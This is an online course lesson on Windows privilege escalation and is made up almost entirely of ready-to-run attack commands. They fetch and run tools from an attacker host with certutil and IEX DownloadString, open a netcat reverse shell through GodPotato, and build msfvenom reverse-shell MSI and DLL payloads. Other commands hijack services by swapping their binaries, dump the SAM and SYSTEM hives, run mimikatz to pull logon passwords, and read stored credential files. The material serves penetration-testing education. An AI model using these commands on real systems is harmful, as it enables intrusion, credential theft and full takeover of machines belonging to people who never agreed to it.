Nerd Level Tech logo
Lesson 18 of 24

Post-Exploitation & Privilege Escalation

Windows Privilege Escalation

5 min read

Windows privilege escalation requires understanding of Windows security mechanisms. This lesson covers essential techniques for gaining SYSTEM or Administrator access.

Enumeration Scripts

WinPEAS

# Download and run
certutil -urlcache -split -f http://attacker-ip/winPEASx64.exe winpeas.exe
.\winpeas.exe

# Or from memory
IEX(New-Object Net.WebClient).DownloadString('http://attacker-ip/winPEAS.bat')

PowerUp

# Import and run
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# From memory
IEX(New-Object Net.WebClient).DownloadString('http://attacker-ip/PowerUp.ps1')
Invoke-AllChecks

Windows Exploit Suggester

# On attacker machine
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt

Manual Enumeration

System Information

# OS version
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Hostname
hostname

# Current user and groups
whoami
whoami /priv
whoami /groups
net user %username%

Users and Groups

# List users
net user
net localgroup

# Administrators
net localgroup administrators

# Domain info
net user /domain
net group /domain

Network Information

ipconfig /all
route print
netstat -ano
arp -a

Privilege Escalation Techniques

1. Service Misconfigurations

Unquoted Service Paths:

# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"

# If path is: C:\Program Files\My Service\service.exe
# Create: C:\Program.exe (runs as service user)

Weak Service Permissions:

# Check service permissions
accesschk64.exe -uwcqv "Everyone" *
accesschk64.exe -uwcqv "Authenticated Users" *

# If writable, replace service binary
sc qc vulnerable_service
sc config vulnerable_service binpath= "C:\temp\shell.exe"
sc stop vulnerable_service
sc start vulnerable_service

Writable Service Binary:

# Check permissions on service executable
icacls "C:\path\to\service.exe"

# If writable, replace with malicious binary
move "C:\path\to\service.exe" "C:\path\to\service.exe.bak"
copy C:\temp\shell.exe "C:\path\to\service.exe"
sc stop service_name
sc start service_name

2. Token Privileges

Check current privileges:

whoami /priv

SeImpersonatePrivilege (Potato Attacks):

# Using JuicyPotato (Windows Server 2016/2019)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t *

# Using PrintSpoofer (Windows 10/Server 2019)
PrintSpoofer.exe -i -c cmd

# Using GodPotato (Universal)
GodPotato.exe -cmd "nc.exe -e cmd.exe attacker-ip 4444"

SeBackupPrivilege:

# Copy SAM and SYSTEM
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system

# Extract hashes offline with secretsdump
impacket-secretsdump -sam sam -system system LOCAL

3. AlwaysInstallElevated

# Check registry
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f msi -o shell.msi

# Install MSI
msiexec /quiet /qn /i shell.msi

4. Scheduled Tasks

# List scheduled tasks
schtasks /query /fo LIST /v

# Check writable task scripts
icacls "C:\path\to\scheduled\script.bat"

# If writable, modify to include reverse shell

5. DLL Hijacking

# Find missing DLLs
# Use Process Monitor to identify DLL search order

# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f dll -o malicious.dll

# Place in DLL search path

6. AutoRuns

# Check AutoRun executables
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check permissions on AutoRun binaries
icacls "C:\path\to\autorun.exe"

7. Stored Credentials

# Saved credentials
cmdkey /list

# If credentials found, use runas
runas /savecred /user:DOMAIN\Administrator "cmd.exe /c whoami > C:\temp\output.txt"

# Search for passwords in files
findstr /si password *.txt *.ini *.config *.xml

# Common locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\System32\sysprep\sysprep.xml
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

8. Kernel Exploits

# Check Windows version
systeminfo

# Notable exploits:
# MS16-032 (Windows 7/8/10, Server 2008/2012)
# MS15-051 (Windows 7, Server 2008)
# PrintNightmare (CVE-2021-34527)

Password Extraction

SAM Database

# From elevated CMD
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system

# Transfer and extract with Impacket
impacket-secretsdump -sam sam -system system LOCAL

Mimikatz

# Run with admin privileges
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

PrivEsc Methodology

1. Run WinPEAS/PowerUp
2. Check whoami /priv for token privileges
3. Look for unquoted service paths
4. Check service permissions
5. Look for AlwaysInstallElevated
6. Check scheduled tasks
7. Look for stored credentials
8. Check AutoRuns permissions
9. Search for sensitive files
10. Check kernel version for exploits

Quick Reference

# Basic enum
systeminfo
whoami /all
net user
net localgroup administrators

# Services
sc query
wmic service get name,pathname

# Token privileges
whoami /priv

# Scheduled tasks
schtasks /query /fo LIST /v

# Registry AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Saved creds
cmdkey /list

Next, we'll cover post-exploitation techniques and persistence. :::

Quiz

Module 5: Post-Exploitation & Privilege Escalation

Take Quiz
FREE WEEKLY NEWSLETTER

Stay on the Nerd Track

One email per week — courses, deep dives, tools, and AI experiments.

No spam. Unsubscribe anytime.